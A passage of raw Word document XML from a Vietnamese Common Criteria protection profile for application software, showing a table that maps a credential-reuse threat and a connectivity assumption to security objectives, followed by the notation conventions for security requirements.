              <w:t>(Tái sử dụng thông tin xác thực)</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1795C0B" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId46" w:anchor="O.PROTECTED_TRANSIT" w:history="1">
              <w:r w:rsidR="00BE21A6" w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>O.PROTECTED_TRANSIT</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="77CCBA3B" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>(Bảo vệ truyền tải)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04115808" w14:textId="7816772D" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Mối đe dọa </w:t>
            </w:r>
            <w:hyperlink r:id="rId47" w:anchor="T.CREDENTIAL_REUSE" w:history="1">
              <w:r w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>T.CREDENTIAL_REUSE</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E51F39" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>được kiểm soát bằng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId48" w:anchor="O.PROTECTED_TRANSIT" w:history="1">
              <w:r w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>O.PROTECTED_TRANSIT</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">vì </w:t>
            </w:r>
            <w:r w:rsidR="00641FE8" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>đối tượng này</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> dựa trên tính </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>an toàn</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> của dữ liệu được truyền.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w14:paraId="24F909E5" w14:textId="77777777" w:rsidTr="00BE21A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2777A08D" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>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33570422" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>O.PROTECTED_STORAGE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C466E0F" w14:textId="5F408B93" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Mối đe dọa </w:t>
            </w:r>
            <w:hyperlink r:id="rId49" w:anchor="T.CREDENTIAL_REUSE" w:history="1">
              <w:r w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>T.CREDENTIAL_REUSE</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E51F39" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>được kiểm soát bằng</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>O.PROTECTED_STORAGE</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> vì </w:t>
            </w:r>
            <w:r w:rsidR="00641FE8" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>đối tượng này</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> dựa trên tính </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>an toàn</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> của thông tin đăng nhập được lưu trữ cục bộ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w14:paraId="0F678982" w14:textId="77777777" w:rsidTr="00BE21A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00FD64DF" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId50" w:anchor="A.CONNECTIVITY" w:history="1">
              <w:r w:rsidR="00BE21A6" w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>A.CONNECTIVITY</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="141367DA" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>(Kết nối)</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783C973" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="008604DD" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId51" w:anchor="OE.RELIABLE_TRANSIT" w:history="1">
              <w:r w:rsidR="00BE21A6" w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>OE.RELIABLE_TRANSIT</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="25D4090C" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>(Truyền tải tin cậy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="526BDF6F" w14:textId="77777777" w:rsidR="00BE21A6" w:rsidRPr="00204C5F" w:rsidRDefault="00BE21A6" w:rsidP="00BD2F41">
            <w:pPr>
              <w:ind w:left="14" w:right="14"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Mục tiêu </w:t>
            </w:r>
            <w:hyperlink r:id="rId52" w:anchor="OE.RELIABLE_TRANSIT" w:history="1">
              <w:r w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>OE.RELIABLE_TRANSIT</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">được thực hiện thông qua </w:t>
            </w:r>
            <w:hyperlink r:id="rId53" w:anchor="A.CONNECTIVITY" w:history="1">
              <w:r w:rsidRPr="00204C5F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Arial"/>
                </w:rPr>
                <w:t>A.CONNECTIVITY</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="014F2CDB" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc502096845"/>
      <w:bookmarkStart w:id="25" w:name="_Toc502652910"/>
      <w:bookmarkStart w:id="26" w:name="_Toc136104117"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>9.1 Quy ước</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55787AE4" w14:textId="513F2996" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Nomal2"/>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Phần này mô tả các yêu cầu </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> phải được thực hiện bởi sản phẩm đang được đánh giá. Những yêu cầu đó bao gồm các thành phần chức năng từ Phần 2 và các thành phần đảm bảo từ Phần 3 của [CC]. Các quy ước sau đây được sử dụng để hoàn thành các hoạt động:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0F528D" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Nomal2"/>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">• Chỉ định: được trình bày dưới dạng </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>văn bản</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>in nghiêng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DEA260" w14:textId="6346C16E" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Nomal2"/>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tinh chỉnh</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>: được trình bày đằng sau từ “</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tinh chỉnh</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="005A544E" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">và </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">được bôi đậm; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6007E45C" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Nomal2"/>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">• Lựa chọn: được trình bày dưới dạng </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">văn </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">bản </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>gạch dưới</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D09310" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Nomal2"/>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">• Chỉ định trong một lựa chọn: được trình bày dưới dạng </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>văn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bản</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> in nghiêng và gạch chân</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A68708" w14:textId="6762E04C" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Nomal2"/>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:spacing w:val="-4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lặp lại</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">: Chỉ định bằng cách thêm các SFR hoặc thành phần tên với một dấu gạch chéo và chỉ </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:spacing w:val="-4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">báo </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>duy nhất</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:spacing w:val="-4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, ví dụ “/</w:t>
      </w:r>
      <w:r w:rsidR="001E309C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:spacing w:val="-4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXAMPLE1</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:spacing w:val="-4"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:rFonts w:cs="Arial"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkStart w:id="27" w:name="_Toc502096847"/>
      <w:bookmarkStart w:id="28" w:name="_Toc502652912"/>
    </w:p>
    <w:p w14:paraId="2C971CEB" w14:textId="69CC7DC5" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> Hướng dẫn yêu cầu chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> của </w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3D2323" w14:textId="4E3E67FA" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Trong cấu hình PP bao gồm</w:t>
      </w:r>
      <w:r w:rsidR="001E309C" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008950B5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hồ sơ bảo vệ cho phần mềm ứng dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
